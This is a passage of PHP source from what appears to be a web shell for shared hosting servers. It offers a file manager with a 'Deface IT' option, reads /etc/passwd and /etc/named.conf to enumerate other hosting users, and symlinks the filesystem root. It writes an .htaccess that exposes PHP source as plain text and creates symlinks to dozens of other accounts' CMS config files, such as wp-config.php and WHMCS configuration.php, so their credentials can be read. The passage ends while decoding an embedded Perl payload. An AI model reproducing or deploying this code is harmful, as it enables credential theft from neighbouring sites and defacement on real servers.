1912$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
1913
1914function getOGid($value)
1915{
1916 if(!function_exists('posix_getegid')) {
1917 $user = @get_current_user();
1918 $uid = @getmyuid();
1919 $gid = @getmygid();
1920 $group = "?";
1921 $owner = $uid . "/". $gid;
1922 return $owner;
1923 } else {
1924 $name=@posix_getpwuid(@fileowner($value));
1925 $group=@posix_getgrgid(@filegroup($value));
1926 $owner = $name['name']. " / ". $group['name'];
1927 return $owner;
1928 }
1929}
1930if(!function_exists("scandir"))
1931{
1932 function scandir($dir) {
1933 $dh = opendir($dir);
1934 while (false !== ($filename = readdir($dh)))
1935 $files[] = $filename;
1936 return $files;
1937 }
1938}
1939function mainfun($dir)
1940{
1941 global $ind, $directorysperator,$os;
1942
1943 $mydir = basename(dirname(__FILE__));
1944 $pdir = str_replace($mydir,"",$dir);
1945 $pdir = str_replace("/","",$dir);
1946
1947 $files = array();
1948 $dirs = array();
1949
1950 $odir=opendir($dir);
1951 while($file = readdir($odir))
1952 {
1953 if(is_dir($dir.'/'.$file))
1954 {
1955 $dirs[]=$file;
1956 }
1957 else
1958 {
1959 $files[]=$file;
1960 }
1961 }
1962 $countfiles = count($dirs) + count($files);
1963 $dircount = count($dirs);
1964 $dircount = $dircount-2;
1965 $myfiles = array_merge($dirs,$files);
1966 $i = 0;
1967 if(is_dir($dir))
1968 {
1969 if(scandir($dir) === false)
1970 echo "<center><font size=3>Directory isn't readable</font></center>";
1971 else
1972 {
1973?><form method="post" id="myform" name="myform">
1974 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
1975 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
1976 <tr><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
1977 <tr height:12px;">
1978 <th>Name</th>
1979 <th>Size</th>
1980 <th>Permissions</th>
1981 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
1982 <th>Modification Date</th>
1983 <th>Rename</th>
1984 <th>Download</th>
1985 <th style="width:2%;">Action</th>
1986 </tr>
1987 <?php
1988 foreach($myfiles as $val)
1989 {
1990 $vv = addslashes($dir . $directorysperator . $val);
1991 $i++;
1992 if($val == ".")
1993 {
1994 ?><tr class=lines><td><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
1995 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
1996
1997 <?php if($os != 'Windows')
1998 {
1999 echo "<td align=center><font size=2>";
2000 echo getOGid($dir)."</font></td>";
2001 }
2002 ?>
2003
2004 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
2005 <td></td><td></td><td></td></</tr><?php
2006
2007 }
2008 else if($val == "..")
2009 {
2010 $val = Trail($dir . $directorysperator . $val,$directorysperator);
2011 $vv = addslashes($val);
2012 if(empty($vv))
2013 $vv = "/"; ?>
2014 <tr class=lines><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
2015 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
2016 <?php if($os != 'Windows')
2017 {
2018 echo "<td align=center><font size=2>";
2019 echo getOGid($val)."</font></td>";
2020
2021 } ?>
2022 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
2023 <td></td><td></td><td></td></tr><?php continue;
2024 }
2025 }
2026 foreach($myfiles as $val)
2027 {
2028 $vv = addslashes($dir . $directorysperator . $val);
2029 $i++;
2030
2031 if(is_dir($vv))
2032 {
2033 if($val == "." || $val == "..")
2034 continue; ?>
2035 <tr class=lines>
2036 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
2037 <td class='info'><font size=2>DIR</font></td>
2038
2039 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2040 <?php if($os != 'Windows')
2041 {
2042 echo "<td align=center><font size=2>";
2043 echo getOGid($val)."</font></td>";
2044 } ?>
2045 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2046 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2047 <td></td>
2048 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2049 </tr></font>
2050 <?php
2051 }
2052 else if(is_file($vv))
2053 {
2054 ?>
2055 <tr class=lines>
2056 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
2057
2058 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
2059
2060 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2061
2062 <?php if($os != 'Windows')
2063 {
2064 echo "<td align=center><font size=2>";
2065 echo getOGid($val)."</font></td>";
2066 } ?>
2067 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2068
2069 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2070 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
2071 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2072 </tr>
2073 <p>
2074 <?php
2075 }
2076 }
2077
2078 echo "</table>
2079<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
2080<select class=sbox name=choice style='width: 100px;'>
2081 <option value=delete>Delete</option>
2082 <option value=chmod>Change mode</option>
2083 if(class_exists('ZipArchive'))
2084 { <option value=compre>Compress</option>
2085 <option value=uncompre>Uncompress</option> }
2086 </select>
2087
2088 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
2089 }}
2090 else
2091 {
2092 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
2093 }
2094
2095}
2096if(isset($_REQUEST["script"]))
2097{
2098 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
2099 ?>
2100 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('scserver')"><font class=txt size="4">| Use Server |</font></a></td>
2101 <td><a href=javascript:void(0) onClick="getdata('scphp')"><font class=txt size="4">| Use PHP |</font></a></td>
2102 </tr></table></center>
2103 <?php
2104}
2105elseif(isset($_REQUEST["scserver"]))
2106{
2107 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('servermanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2108 <td><a href=javascript:void(0) onClick="getdata('serverscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2109 </tr></table></center><?php
2110}
2111else if(isset($_REQUEST['servermanuallyscript']))
2112{
2113 ?>
2114 <center>
2115 <form action="<?php echo $self; ?>" method="post">
2116 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2117 <input type="button" OnClick="manuallyscriptfn('serverscriptlocator',passwd.value)" value="Get Config" class="but">
2118 </form>
2119 </center>
2120 <?php
2121}
2122elseif(isset($_REQUEST['serverscriptlocator']))
2123{
2124 if($os != "Windows")
2125 {
2126 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2127 $path=explode('/',$url);
2128 $url =str_replace($path[count($path)-1],'',$url);
2129 if(isset($_REQUEST['passwd']))
2130 {
2131 $getetc = trim($_REQUEST['passwd']);
2132
2133 mkdir("dhanushSPT");
2134 chdir("dhanushSPT");
2135
2136 $myfile = fopen("test.txt","w");
2137
2138 fputs($myfile,$getetc);
2139 fclose($myfile);
2140 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Username</font></td><td align=center><font size=4 >Script</font></td></tr>";
2141 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2142 while(!feof($file))
2143 {
2144 $s = fgets($file);
2145 $matches = array();
2146 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2147 $matches = str_replace("home/","",$matches[1]);
2148 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2149 $headers=get_headers($hs_status);
2150 if(strpos($headers[0],'200') == true )
2151 $hs_script = "Wordpress";
2152 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2153 $headers=get_headers($hs_status);
2154 if(strpos($headers[0],'200') == true )
2155 $hs_script = "Wordpress";
2156 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2157 $headers=get_headers($hs_status);
2158 if(strpos($headers[0],'200') == true )
2159 $hs_script = "Joomla";
2160 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2161 $headers=get_headers($hs_status);
2162 if(strpos($headers[0],'200') == true )
2163 $hs_script = "Vbulletin";
2164 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2165 $headers=get_headers($hs_status);
2166 if(strpos($headers[0],'200') == true )
2167 $hs_script = "Vbulletin";
2168 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2169 $headers=get_headers($hs_status);
2170 if(strpos($headers[0],'200') == true )
2171 $hs_script = "Mybb";
2172 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2173 $headers=get_headers($hs_status);
2174 if(strpos($headers[0],'200') == true )
2175 $hs_script = "IPB";
2176 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2177 $headers=get_headers($hs_status);
2178 if(strpos($headers[0],'200') == true )
2179 $hs_script = "SMF";
2180 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2181 $headers=get_headers($hs_status);
2182 if(strpos($headers[0],'200') == true )
2183 $hs_script = "WHMCS";
2184 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2185 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2186 $dcount++;
2187 }
2188 echo "</table>";
2189 fclose($file);
2190 unlink("test.txt");
2191 }
2192 else
2193 {
2194 $d0mains = @file("/etc/named.conf");
2195 if($d0mains)
2196 {
2197 @mkdir("dhanush",0777);
2198 @chdir("dhanush");
2199 execmd("ln -s / root");
2200 $file3 = 'Options all
2201 DirectoryIndex Sux.html
2202 AddType text/plain .php
2203 AddHandler server-parsed .php
2204 AddType text/plain .html
2205
2206
2207
2208 AddHandler txt .html
2209 Require None
2210 Satisfy Any
2211 ';
2212 $fp3 = fopen('.htaccess','w');
2213 $fw3 = fwrite($fp3,$file3);
2214 @fclose($fp3);
2215 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Site</font></td><td align=center><font size=4 >Script</font></td></tr>";
2216 $dcount = 1;
2217 foreach($d0mains as $d0main)
2218 {
2219 if(eregi("zone",$d0main))
2220 {
2221 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2222 flush();
2223
2224 if(strlen(trim($domains[1][0])) > 2)
2225 {
2226 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2227 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/wp-config.php";
2228 $headers=get_headers($hs_status);
2229 if(strpos($headers[0],'200') == true )
2230 $hs_script = "Wordpress";
2231 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/blog/wp-config.php";
2232 $headers=get_headers($hs_status);
2233 if(strpos($headers[0],'200') == true )
2234 $hs_script = "Wordpress";
2235 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/configuration.php";
2236 $headers=get_headers($hs_status);
2237 if(strpos($headers[0],'200') == true )
2238 $hs_script = "Joomla";
2239 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/forum/includes/config.php";
2240 $headers=get_headers($hs_status);
2241 if(strpos($headers[0],'200') == true )
2242 $hs_script = "Vbulletin";
2243 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/core/includes/config.php";
2244 $headers=get_headers($hs_status);
2245 if(strpos($headers[0],'200') == true )
2246 $hs_script = "Vbulletin";
2247 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/inc/config.php";
2248 $headers=get_headers($hs_status);
2249 if(strpos($headers[0],'200') == true )
2250 $hs_script = "Mybb";
2251 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/conf_global.php";
2252 $headers=get_headers($hs_status);
2253 if(strpos($headers[0],'200') == true )
2254 $hs_script = "IPB";
2255 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/settings.php";
2256 $headers=get_headers($hs_status);
2257 if(strpos($headers[0],'200') == true )
2258 $hs_script = "SMF";
2259 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/submitticket.php";
2260 $headers=get_headers($hs_status);
2261 if(strpos($headers[0],'200') == true )
2262 $hs_script = "WHMCS";
2263 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td><a href=".$domains[1][0]." target='_blank'><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt><a href=".$hs_status." target=_blank>".$hs_user."</a></font></td></tr>"; flush();
2264
2265 $dcount++;
2266 }
2267 }
2268
2269 }
2270 echo "</table>";
2271 }
2272 else
2273 {
2274 $TEST=@file('/etc/passwd');
2275 if ($TEST)
2276 {
2277 @mkdir("dhanush",0777);
2278 @chdir("dhanush");
2279 execmd("ln -s / root");
2280 $file3 = 'Options all
2281 DirectoryIndex Sux.html
2282 AddType text/plain .php
2283 AddHandler server-parsed .php
2284 AddType text/plain .html
2285 AddHandler txt .html
2286 Require None
2287 Satisfy Any
2288 ';
2289 $fp3 = fopen('.htaccess','w');
2290 $fw3 = fwrite($fp3,$file3);
2291 @fclose($fp3);
2292
2293 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2294
2295 $dcount = 1;
2296 $file = fopen("/etc/passwd", "r");
2297 //Output a line of the file until the end is reached
2298 while(!feof($file))
2299 {
2300 $s = fgets($file);
2301 $matches = array();
2302 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2303 $matches = str_replace("home/","",$matches[1]);
2304 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2305 $headers=get_headers($hs_status);
2306 if(strpos($headers[0],'200') == true )
2307 $hs_script = "Wordpress";
2308 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2309 $headers=get_headers($hs_status);
2310 if(strpos($headers[0],'200') == true )
2311 $hs_script = "Wordpress";
2312 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2313 $headers=get_headers($hs_status);
2314 if(strpos($headers[0],'200') == true )
2315 $hs_script = "Joomla";
2316 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2317 $headers=get_headers($hs_status);
2318 if(strpos($headers[0],'200') == true )
2319 $hs_script = "Vbulletin";
2320 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2321 $headers=get_headers($hs_status);
2322 if(strpos($headers[0],'200') == true )
2323 $hs_script = "Vbulletin";
2324 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2325 $headers=get_headers($hs_status);
2326 if(strpos($headers[0],'200') == true )
2327 $hs_script = "Mybb";
2328 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2329 $headers=get_headers($hs_status);
2330 if(strpos($headers[0],'200') == true )
2331 $hs_script = "IPB";
2332 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2333 $headers=get_headers($hs_status);
2334 if(strpos($headers[0],'200') == true )
2335 $hs_script = "SMF";
2336 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2337 $headers=get_headers($hs_status);
2338 if(strpos($headers[0],'200') == true )
2339 $hs_script = "WHMCS";
2340 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2341 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2342 $dcount++;
2343 }
2344 fclose($file);
2345
2346 echo "</table>";
2347 }
2348 else
2349 {
2350 @mkdir("dhanush",0777);
2351 @chdir("dhanush");
2352 execmd("ln -s / root");
2353 $file3 = 'Options all
2354 DirectoryIndex Sux.html
2355 AddType text/plain .php
2356 AddHandler server-parsed .php
2357 AddType text/plain .html
2358 AddHandler txt .html
2359 Require None
2360 Satisfy Any
2361 ';
2362 $fp3 = fopen('.htaccess','w');
2363 $fw3 = fwrite($fp3,$file3);
2364 @fclose($fp3);
2365 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2366 $temp = "";
2367 $val1 = 0;
2368 $val2 = 1000;
2369 for(;$val1 <= $val2;$val1++)
2370 {
2371 $uid = @posix_getpwuid($val1);
2372 if ($uid)
2373 $temp .= join(':',$uid)."\n";
2374 }
2375 echo '<br/>';
2376 $temp = trim($temp);
2377
2378 $file5 = fopen("test.txt","w");
2379 fputs($file5,$temp);
2380 fclose($file5);
2381
2382 $dcount = 1;
2383 $file = fopen("test.txt", "r");
2384 while(!feof($file))
2385 {
2386 $s = fgets($file);
2387 $matches = array();
2388 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2389 $matches = str_replace("home/","",$matches[1]);
2390 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2391 $headers=get_headers($hs_status);
2392 if(strpos($headers[0],'200') == true )
2393 $hs_script = "Wordpress";
2394 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2395 $headers=get_headers($hs_status);
2396 if(strpos($headers[0],'200') == true )
2397 $hs_script = "Wordpress";
2398 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2399 $headers=get_headers($hs_status);
2400 if(strpos($headers[0],'200') == true )
2401 $hs_script = "Joomla";
2402 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2403 $headers=get_headers($hs_status);
2404 if(strpos($headers[0],'200') == true )
2405 $hs_script = "Vbulletin";
2406 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2407 $headers=get_headers($hs_status);
2408 if(strpos($headers[0],'200') == true )
2409 $hs_script = "Vbulletin";
2410 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2411 $headers=get_headers($hs_status);
2412 if(strpos($headers[0],'200') == true )
2413 $hs_script = "Mybb";
2414 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2415 $headers=get_headers($hs_status);
2416 if(strpos($headers[0],'200') == true )
2417 $hs_script = "IPB";
2418 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2419 $headers=get_headers($hs_status);
2420 if(strpos($headers[0],'200') == true )
2421 $hs_script = "SMF";
2422 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2423 $headers=get_headers($hs_status);
2424 if(strpos($headers[0],'200') == true )
2425 $hs_script = "WHMCS";
2426 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2427 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2428 $dcount++;
2429 }
2430 fclose($file);
2431 echo "</table>";
2432 unlink("test.txt");
2433 }
2434 }
2435 }
2436 }
2437 else
2438 echo "<center>Cannot Get Scripts</center>";
2439}
2440elseif(isset($_REQUEST["scphp"]))
2441{
2442 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('phpmanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2443 <td><a href=javascript:void(0) onClick="getdata('phpscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2444 </tr></table></center><?php
2445}
2446else if(isset($_REQUEST['phpmanuallyscript']))
2447{
2448 ?>
2449 <center>
2450 <form action="<?php echo $self; ?>" method="post">
2451 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2452 <input type="button" OnClick="manuallyscriptfn('phpscriptlocator',passwd.value)" value="Get Config" class="but">
2453 </form>
2454 </center>
2455 <?php
2456}
2457else if(isset($_REQUEST['phpscriptlocator']))
2458{
2459 if($os == "Linux")
2460 {
2461 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2462 $path=explode('/',$url);
2463 $url =str_replace($path[count($path)-1],'',$url);
2464 function syml($usern,$pdomain)
2465 {
2466 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
2467 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2468 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
2469 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
2470 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
2471 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
2472 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
2473 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
2474 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
2475 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
2476 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
2477 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
2478 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
2479 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
2480 symlink('/home/'.$usern.'/public_html/bb-config.php',$pdomain.'~~boxbilling.txt');
2481 symlink('/home/'.$usern.'/public_html/billing/bb-config.php',$pdomain.'~~boxbilling.txt');
2482 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
2483 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
2484 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
2485 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
2486 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
2487 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
2488 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
2489 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
2490 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
2491 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
2492 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
2493 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
2494 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
2495 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
2496 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
2497 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
2498 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
2499 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
2500 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
2501 }
2502 if(isset($_REQUEST['passwd']))
2503 {
2504 $getetc = trim($_REQUEST['passwd']);
2505
2506 mkdir("dhanushSPT");
2507 chdir("dhanushSPT");
2508 $file3 = 'Options all
2509 DirectoryIndex Sux.html
2510 AddType text/plain .php
2511 AddHandler server-parsed .php
2512 AddType text/plain .html
2513 AddHandler txt .html
2514 Require None
2515 Satisfy Any
2516 ';
2517 $fp3 = fopen('.htaccess','w');
2518 $fw3 = fwrite($fp3,$file3);
2519 @fclose($fp3);
2520 $myfile = fopen("test.txt","w");
2521 fputs($myfile,$getetc);
2522 fclose($myfile);
2523
2524 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2525 while(!feof($file))
2526 {
2527 $s = fgets($file);
2528 $matches = array();
2529 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2530 $matches = str_replace("home/","",$matches[1]);
2531 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2532 continue;
2533 syml($matches,$matches);
2534 }
2535 fclose($file);
2536 unlink("test.txt");
2537 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2538 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2539
2540 }
2541 else
2542 {
2543 $d0mains = @file("/etc/named.conf");
2544 if($d0mains)
2545 {
2546 mkdir("dhanushST");
2547 chdir("dhanushST");
2548 $file3 = 'Options all
2549 DirectoryIndex Sux.html
2550 AddType text/plain .php
2551 AddHandler server-parsed .php
2552 AddType text/plain .html
2553 AddHandler txt .html
2554 Require None
2555 Satisfy Any
2556 ';
2557 $fp3 = fopen('.htaccess','w');
2558 $fw3 = fwrite($fp3,$file3);
2559 @fclose($fp3);
2560 foreach($d0mains as $d0main)
2561 {
2562 if(eregi("zone",$d0main))
2563 {
2564 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2565 flush();
2566
2567 if(strlen(trim($domains[1][0])) > 2)
2568 {
2569 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2570
2571 syml($user['name'],$domains[1][0]);
2572 }
2573 }
2574 }
2575 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2576 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2577 }
2578 else
2579 {
2580 mkdir("dhanushSPT");
2581 chdir("dhanushSPT");
2582 $file3 = 'Options all
2583 DirectoryIndex Sux.html
2584 AddType text/plain .php
2585 AddHandler server-parsed .php
2586 AddType text/plain .html
2587 AddHandler txt .html
2588 Require None
2589 Satisfy Any
2590 ';
2591 $fp3 = fopen('.htaccess','w');
2592 $fw3 = fwrite($fp3,$file3);
2593 @fclose($fp3);
2594 $temp = "";
2595 $val1 = 0;
2596 $val2 = 1000;
2597 for(;$val1 <= $val2;$val1++)
2598 {
2599 $uid = @posix_getpwuid($val1);
2600 if ($uid)
2601 $temp .= join(':',$uid)."\n";
2602 }
2603 echo '<br/>';
2604 $temp = trim($temp);
2605
2606 $file5 = fopen("test.txt","w");
2607 fputs($file5,$temp);
2608 fclose($file5);
2609
2610
2611 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2612 while(!feof($file))
2613 {
2614 $s = fgets($file);
2615 $matches = array();
2616 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2617 $matches = str_replace("home/","",$matches[1]);
2618 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2619 continue;
2620 syml($matches,$matches);
2621 }
2622 fclose($file);
2623 echo "</table>";
2624 unlink("test.txt");
2625 echo "<center><font class=txt size=3>[ Done ]</font></center>";
2626 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
2627 }
2628 }
2629 }
2630 else
2631 echo "<center>Cannot Complete the task!!!!</center>";
2632
2633}
2634else if(isset($_GET["perlsymlink"]))
2635{
2636 @mkdir("dhanush",0777);
2637 @chdir("dhanush");
2638 $dhanushsym = gzuncompress(base64_decode($plsym));
